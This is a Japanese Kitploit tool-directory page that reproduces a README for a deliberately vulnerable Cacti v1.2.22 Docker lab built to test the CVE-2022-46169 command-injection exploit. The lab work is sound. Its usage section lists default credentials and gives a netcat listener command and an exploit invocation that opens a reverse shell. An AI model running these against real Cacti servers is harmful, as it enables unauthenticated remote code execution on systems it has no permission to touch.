Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cacti-rce-cve-2022-46169-vulnerable-application — 警告: これはCactiコマンドインジェクション(CVE-2022-46169)のエクスプロイトをテストするための脆弱性アプリケーションです。自己責任で実行してください! | Kitploit
ツール/GitHubGitHub/m3ssap0/cacti-rce-cve-2022-46169-vulnerable-application
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールラボと実践
GitHubm3ssap0/cacti-rce-cve-2022-46169-vulnerable-application

cacti-rce-cve-2022-46169-vulnerable-application

警告: これはCactiコマンドインジェクション(CVE-2022-46169)のエクスプロイトをテストするための脆弱性アプリケーションです。自己責任で実行してください!

リポジトリを見る
1233年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Cacti v1.2.22 コマンドインジェクション (CVE-2022-46169) 脆弱なアプリケーション

これは、Cacti の脆弱性 (CVE-2022-46169) に対するエクスプロイトをテストするための脆弱なアプリケーションです。

警告!

このアプリケーションには深刻なセキュリティ脆弱性が含まれています。自己責任で実行してください!バックアップを取り、隔離された環境(最近のスナップショットとホストオンリーネットワークを備えたVMなど)での使用を推奨します。このアプリケーションをインターネットに公開されたサーバーにアップロードしないでください。侵害されます。

免責事項: このアプリケーションをどのように使用するかについて、私は一切責任を負いません。このアプリケーションの唯一の目的は、CVE-2022-46169エクスプロイトのテストシナリオを提供することであり、悪意を持って使用されるべきではありません。このアプリケーションのインストールによってサーバーが侵害された場合、それは私の責任ではなく、アップロードしてインストールした人物の責任です。

脆弱性情報

  • CVE-ID: CVE-2022-46169
  • リンク: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46169
  • 説明: 影響を受けるバージョンでは、特定のデータソースが監視対象デバイスに選択されている場合、コマンドインジェクションの脆弱性により、認証されていないユーザーがCactiを実行しているサーバー上で任意のコードを実行できる可能性があります。

使用方法

環境をセットアップする手順は次のとおりです。

  1. 構成を開始するには docker compose up -d を実行します。
  2. http://127.0.0.1/cacti にブラウザでアクセスして、Cacti 初期化ウィザードを開始することで、手順を完了できます。データベースに関するエラーが発生した場合は、少し待ってからページを更新してください。
  3. デフォルトの認証情報は admin/ です。
admin
  • ウィザード中はすべてのボタンで "Next" を押し、それに応じてオプションを選択してください。デフォルトのままで問題なく、必須の前提条件はすべて満たされているはずです。
  • インストール後、新しいグラフをセットアップする必要があります:
    1. "Create graphs" をクリックします。
    2. "Graph Templates" セクションの "Create" の横にあるドロップダウンメニューで、"Device - Uptime" を選択します。
    3. "Create" ボタンを押します。
  • コンテナは vuln-cacti という名前になります。

    環境を破棄するには、docker compose down コマンドを使用します。

    Cacti の公式インストールガイドは ここ にあります。

    根本原因

    この脆弱性の詳細な根本原因は ここ で確認できます。

    エクスプロイト

    公開エクスプロイトは Exploit-DB で提供されています。簡単のため、exploit/ フォルダーにコピーされています。

    実行するには:

    1. ホストマシンで netcat を使用して着信接続を待ち受けます。
      root@kitploit:~
      nc -lvp 6669
      
    2. エクスプロイトを起動します。
      root@kitploit:~
       ./exploit/exploit.py -u http://127.0.0.1/cacti/ -i host.docker.internal -p 6669
      
      ヒント: コンテナからホストマシンにアクセスするには host.docker.internal を使用します (参考)。

    vulhub リポジトリ にもエントリがあります。

    著者

    • Antonio Francesco Sardella - 実装 - m3ssap0

    ライセンス

    このプロジェクトは Unlicense の下でライセンスされています。詳細は LICENSE ファイルを参照してください。

    謝辞

    • Stefan Schiller — この脆弱性を発見したセキュリティ研究者。
    • Riadh Bouchahoua — エクスプロイト開発者。
    ツールをダウンロード